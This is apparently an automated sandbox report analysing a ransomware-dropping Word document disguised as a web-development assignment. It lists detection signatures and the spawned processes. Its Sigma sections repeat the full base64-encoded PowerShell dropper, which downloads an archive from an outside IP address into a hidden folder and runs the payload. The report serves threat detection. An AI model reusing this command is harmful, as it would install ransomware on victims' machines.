Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
em_webdev_assignment_dec2024.doc

Overview

General Information

Sample name:em_webdev_assignment_dec2024.doc
Analysis ID:1579175
MD5:f6029da9935b2b83ecf0194611a31207
SHA1:91e33bf7a512ace86fc4394a1761d03195d47787
SHA256:6fa7a912d145bc6a446c6882983981b3ceb91b50090dc0eadd1a7f77d70c6cac
Tags:docuser-smica83
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious encrypted Powershell command line found
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Office process queries suspicious COM object (likely to drop second stage)
Powershell drops PE file
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes a notice file (html or txt) to demand a ransom
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Execution of Powershell with Base64
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 1620 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • powershell.exe (PID: 7268 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgAwADgALgAyADAANgAuADEAOQA1AC8AZAAvAGEAcwBzAGkAZwBuAG0AZQBuAHQALgB6AGkAcAAiADsAJABwAGEAdABoACAAPQAgACIAQwA6AFwAVQBzAGUAcgBzAFwAJABlAG4AdgA6AHUAcwBlAHIAbgBhAG0AZQBcAHAANAB5AHgAMAByAGwAMABzADMAIgA7AG0AawBkAGkAcgAgACQAcABhAHQAaAA7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAE4AYQBtAGUAIABBAHQAdAByAGkAYgB1AHQAZQBzACAALQBWAGEAbAB1AGUAIAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAEEAdAB0AHIAaQBiAHUAdABlAHMAXQA6ADoASABpAGQAZABlAG4AKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABwAGEAdABoACAAKwAgACIAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgApADsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAHAAYQB0AGgAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIAAiACQAcABhAHQAaABcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkAIgA7AEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgACIAJABwAGEAdABoAFwAYQBzAHMAaQBnAG4AbQBlAG4AdAAoADIAKQBcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABwAGEAdABoACIAOwBjAGQAIAAkAHAAYQB0AGgAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgByAHUAbgAuAGUAeABlACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA== MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • run.exe (PID: 7724 cmdline: "C:\Users\user\p4yx0rl0s3\run.exe" MD5: CD860C78E0374DEC3A2B1A73507FCE4A)
        • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7804 cmdline: "cmd" /c start "" "C:\Users\user\p4yx0rl0s3\note.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • notepad.exe (PID: 7928 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\p4yx0rl0s3\note.txt MD5: 27F71B12CB585541885A31BE22F61C83)
  • run.exe (PID: 5740 cmdline: "C:\Users\user\p4yx0rl0s3\run.exe" MD5: CD860C78E0374DEC3A2B1A73507FCE4A)
    • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7240 cmdline: "cmd" /c start "" "C:\Users\user\p4yx0rl0s3\note.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • notepad.exe (PID: 7388 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\p4yx0rl0s3\note.txt MD5: 27F71B12CB585541885A31BE22F61C83)
  • run.exe (PID: 5104 cmdline: "C:\Users\user\p4yx0rl0s3\run.exe" MD5: CD860C78E0374DEC3A2B1A73507FCE4A)
    • conhost.exe (PID: 7564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7660 cmdline: "cmd" /c start "" "C:\Users\user\p4yx0rl0s3\note.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • notepad.exe (PID: 7692 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\p4yx0rl0s3\note.txt MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7268JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    SourceRuleDescriptionAuthorStrings
    amsi32_7268.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgAwADgALgAyADAANgAuADEAOQA1AC8AZAAvAGEAcwBzAGkAZwBuAG0AZQBuAHQALgB6AGkAcAAiADsAJABwAGEAdABoACAAPQAgACIAQwA6AFwAVQBzAGUAcgBzAFwAJABlAG4AdgA6AHUAcwBlAHIAbgBhAG0AZQBcAHAANAB5AHgAMAByAGwAMABzADMAIgA7AG0AawBkAGkAcgAgACQAcABhAHQAaAA7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAE4AYQBtAGUAIABBAHQAdAByAGkAYgB1AHQAZQBzACAALQBWAGEAbAB1AGUAIAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAEEAdAB0AHIAaQBiAHUAdABlAHMAXQA6ADoASABpAGQAZABlAG4AKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABwAGEAdABoACAAKwAgACIAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgApADsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAHAAYQB0AGgAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIAAiACQAcABhAHQAaABcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkAIgA7AEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgACIAJABwAGEAdABoAFwAYQBzAHMAaQBnAG4AbQBlAG4AdAAoADIAKQBcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABwAGEAdABoACIAOwBjAGQAIAAkAHAAYQB0AGgAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgByAHUAbgAuAGUAeABlACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgAwADgALgAyADAANgAuADEAOQA1AC8AZAAvAGEAcwBzAGkAZwBuAG0AZQBuAHQALgB6AGkAcAAiADsAJABwAGEAdABoACAAPQAgACIAQwA6AFwAVQBzAGUAcgBzAFwAJABlAG4AdgA6AHUAcwBlAHIAbgBhAG0AZQBcAHAANAB5AHgAMAByAGwAMABzADMAIgA7AG0AawBkAGkAcgAgACQAcABhAHQAaAA7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAE4AYQBtAGUAIABBAHQAdAByAGkAYgB1AHQAZQBzACAALQBWAGEAbAB1AGUAIAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAEEAdAB0AHIAaQBiAHUAdABlAHMAXQA6ADoASABpAGQAZABlAG4AKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABwAGEAdABoACAAKwAgACIAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgApADsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAHAAYQB0AGgAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIAAiACQAcABhAHQAaABcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkAIgA7AEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgACIAJABwAGEAdABoAFwAYQBzAHMAaQBnAG4AbQBlAG4AdAAoADIAKQBcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABwAGEAdABoACIAOwBjAGQAIAAkAHAAYQB0AGgAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgByAHUAbgAuAGUAeABlACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgAwADgALgAyADAANgAuADEAOQA1AC8AZAAvAGEAcwBzAGkAZwBuAG0AZQBuAHQALgB6AGkAcAAiADsAJABwAGEAdABoACAAPQAgACIAQwA6AFwAVQBzAGUAcgBzAFwAJABlAG4AdgA6AHUAcwBlAHIAbgBhAG0AZQBcAHAANAB5AHgAMAByAGwAMABzADMAIgA7AG0AawBkAGkAcgAgACQAcABhAHQAaAA7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAE4AYQBtAGUAIABBAHQAdAByAGkAYgB1AHQAZQBzACAALQBWAGEAbAB1AGUAIAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAEEAdAB0AHIAaQBiAHUAdABlAHMAXQA6ADoASABpAGQAZABlAG4AKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABwAGEAdABoACAAKwAgACIAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgApADsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAHAAYQB0AGgAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIAAiACQAcABhAHQAaABcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkAIgA7AEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgACIAJABwAGEAdABoAFwAYQBzAHMAaQBnAG4AbQBlAG4AdAAoADIAKQBcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABwAGEAdABoACIAOwBjAGQAIAAkAHAAYQB0AGgAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgByAHUAbgAuAGUAeABlACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgAwADgALgAyADAANgAuADEAOQA1AC8AZAAvAGEAcwBzAGkAZwBuAG0AZQBuAHQALgB6AGkAcAAiADsAJABwAGEAdABoACAAPQAgACIAQwA6AFwAVQBzAGUAcgBzAFwAJABlAG4AdgA6AHUAcwBlAHIAbgBhAG0AZQBcAHAANAB5AHgAMAByAGwAMABzADMAIgA7AG0AawBkAGkAcgAgACQAcABhAHQAaAA7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAE4AYQBtAGUAIABBAHQAdAByAGkAYgB1AHQAZQBzACAALQBWAGEAbAB1AGUAIAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAEEAdAB0AHIAaQBiAHUAdABlAHMAXQA6ADoASABpAGQAZABlAG4AKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABwAGEAdABoACAAKwAgACIAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgApADsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAHAAYQB0AGgAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIAAiACQAcABhAHQAaABcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkAIgA7AEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgACIAJABwAGEAdABoAFwAYQBzAHMAaQBnAG4AbQBlAG4AdAAoADIAKQBcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABwAGEAdABoACIAOwBjAGQAIAAkAHAAYQB0AGgAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgByAHUAbgAuAGUAeABlACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgAwADgALgAyADAANgAuADEAOQA1AC8AZAAvAGEAcwBzAGkAZwBuAG0AZQBuAHQALgB6AGkAcAAiADsAJABwAGEAdABoACAAPQAgACIAQwA6AFwAVQBzAGUAcgBzAFwAJABlAG4AdgA6AHUAcwBlAHIAbgBhAG0AZQBcAHAANAB5AHgAMAByAGwAMABzADMAIgA7AG0AawBkAGkAcgAgACQAcABhAHQAaAA7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAE4AYQBtAGUAIABBAHQAdAByAGkAYgB1AHQAZQBzACAALQBWAGEAbAB1AGUAIAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAEEAdAB0AHIAaQBiAHUAdABlAHMAXQA6ADoASABpAGQAZABlAG4AKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABwAGEAdABoACAAKwAgACIAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgApADsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAHAAYQB0AGgAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIAAiACQAcABhAHQAaABcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkAIgA7AEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgACIAJABwAGEAdABoAFwAYQBzAHMAaQBnAG4AbQBlAG4AdAAoADIAKQBcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABwAGEAdABoACIAOwBjAGQAIAAkAHAAYQB0AGgAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgByAHUAbgAuAGUAeABlACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgAwADgALgAyADAANgAuADEAOQA1AC8AZAAvAGEAcwBzAGkAZwBuAG0AZQBuAHQALgB6AGkAcAAiADsAJABwAGEAdABoACAAPQAgACIAQwA6AFwAVQBzAGUAcgBzAFwAJABlAG4AdgA6AHUAcwBlAHIAbgBhAG0AZQBcAHAANAB5AHgAMAByAGwAMABzADMAIgA7AG0AawBkAGkAcgAgACQAcABhAHQAaAA7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAE4AYQBtAGUAIABBAHQAdAByAGkAYgB1AHQAZQBzACAALQBWAGEAbAB1AGUAIAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAEEAdAB0AHIAaQBiAHUAdABlAHMAXQA6ADoASABpAGQAZABlAG4AKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABwAGEAdABoACAAKwAgACIAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgApADsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAHAAYQB0AGgAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIAAiACQAcABhAHQAaABcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkAIgA7AEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgACIAJABwAGEAdABoAFwAYQBzAHMAaQBnAG4AbQBlAG4AdAAoADIAKQBcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABwAGEAdABoACIAOwBjAGQAIAAkAHAAYQB0AGgAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgByAHUAbgAuAGUAeABlACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgAwADgALgAyADAANgAuADEAOQA1AC8AZAAvAGEAcwBzAGkAZwBuAG0AZQBuAHQALgB6AGkAcAAiADsAJABwAGEAdABoACAAPQAgACIAQwA6AFwAVQBzAGUAcgBzAFwAJABlAG4AdgA6AHUAcwBlAHIAbgBhAG0AZQBcAHAANAB5AHgAMAByAGwAMABzADMAIgA7AG0AawBkAGkAcgAgACQAcABhAHQAaAA7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAE4AYQBtAGUAIABBAHQAdAByAGkAYgB1AHQAZQBzACAALQBWAGEAbAB1AGUAIAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAEEAdAB0AHIAaQBiAHUAdABlAHMAXQA6ADoASABpAGQAZABlAG4AKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABwAGEAdABoACAAKwAgACIAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgApADsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAHAAYQB0AGgAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIAAiACQAcABhAHQAaABcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkAIgA7AEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgACIAJABwAGEAdABoAFwAYQBzAHMAaQBnAG4AbQBlAG4AdAAoADIAKQBcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABwAGEAdABoACIAOwBjAGQAIAAkAHAAYQB0AGgAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgByAHUAbgAuAGUAeABlACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgAwADgALgAyADAANgAuADEAOQA1AC8AZAAvAGEAcwBzAGkAZwBuAG0AZQBuAHQALgB6AGkAcAAiADsAJABwAGEAdABoACAAPQAgACIAQwA6AFwAVQBzAGUAcgBzAFwAJABlAG4AdgA6AHUAcwBlAHIAbgBhAG0AZQBcAHAANAB5AHgAMAByAGwAMABzADMAIgA7AG0AawBkAGkAcgAgACQAcABhAHQAaAA7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAE4AYQBtAGUAIABBAHQAdAByAGkAYgB1AHQAZQBzACAALQBWAGEAbAB1AGUAIAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAEEAdAB0AHIAaQBiAHUAdABlAHMAXQA6ADoASABpAGQAZABlAG4AKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABwAGEAdABoACAAKwAgACIAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgApADsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAHAAYQB0AGgAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIAAiACQAcABhAHQAaABcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkAIgA7AEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgACIAJABwAGEAdABoAFwAYQBzAHMAaQBnAG4AbQBlAG4AdAAoADIAKQBcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABwAGEAdABoACIAOwBjAGQAIAAkAHAAYQB0AGgAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgByAHUAbgAuAGUAeABlACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.
